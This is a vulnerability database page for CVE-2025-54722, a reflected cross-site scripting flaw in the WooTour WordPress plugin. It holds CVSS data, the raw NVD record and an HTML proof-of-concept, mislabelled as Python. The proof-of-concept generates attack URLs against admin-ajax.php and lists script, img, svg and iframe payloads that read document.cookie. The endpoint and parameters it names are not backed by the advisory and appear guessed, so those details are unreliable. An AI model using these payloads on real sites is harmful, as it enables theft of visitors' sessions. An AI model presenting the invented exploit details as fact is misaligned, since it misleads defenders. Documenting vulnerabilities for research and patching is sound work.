Security Vulnerability Report
中文
CVE-2025-54722 CVSS 7.1 HIGH

CVE-2025-54722

Published: 2025-11-06 16:15:58
Last Modified: 2026-04-27 16:16:29

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ex-Themes WooTour woo-tour allows Reflected XSS.This issue affects WooTour: from n/a through <= 3.6.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WooTour插件 <= 3.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-54722 WooTour Reflected XSS PoC --> <!-- Replace YOUR_TARGET with actual target URL --> <!DOCTYPE html> <html> <head> <title>CVE-2025-54722 PoC</title> </head> <body> <h2>CVE-2025-54722 WooTour Reflected XSS PoC</h2> <p>Target URL Pattern:</p> <code id="urlPattern"></code> <p>XSS Payload:</p> <input type="text" id="xssPayload" value='"><script>alert(document.cookie)</script>' size="50"> <button onclick="generateURL()">Generate Malicious URL</button> <p>Generated Attack URL:</p> <textarea id="attackUrl" rows="3" cols="80" readonly></textarea> <p>Common vulnerable parameters:</p> <ul> <li>?tour_id="><script>alert(1)</script></li> <li>?search="><img src=x onerror=alert(document.domain)></li> <li>?id="><svg onload=alert(document.cookie)></li> <li>?page="><iframe src="javascript:alert(document.cookie)"></li> </ul> <script> function generateURL() { var baseUrl = "http://YOUR_TARGET/wp-admin/admin-ajax.php"; var payload = document.getElementById("xssPayload").value; var maliciousUrl = baseUrl + "?action=wootour_search&s=" + encodeURIComponent(payload); document.getElementById("attackUrl").value = maliciousUrl; } // Display example URL pattern document.getElementById("urlPattern").innerHTML = "http://[target]/wp-admin/admin-ajax.php?action=wootour_search&s=[XSS_PAYLOAD]"; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54722", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:58.277", "lastModified": "2026-04-27T16:16:29.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ex-Themes WooTour woo-tour allows Reflected XSS.This issue affects WooTour: from n/a through <= 3.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-tour/vulnerability/wordpress-wootour-plugin-3-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}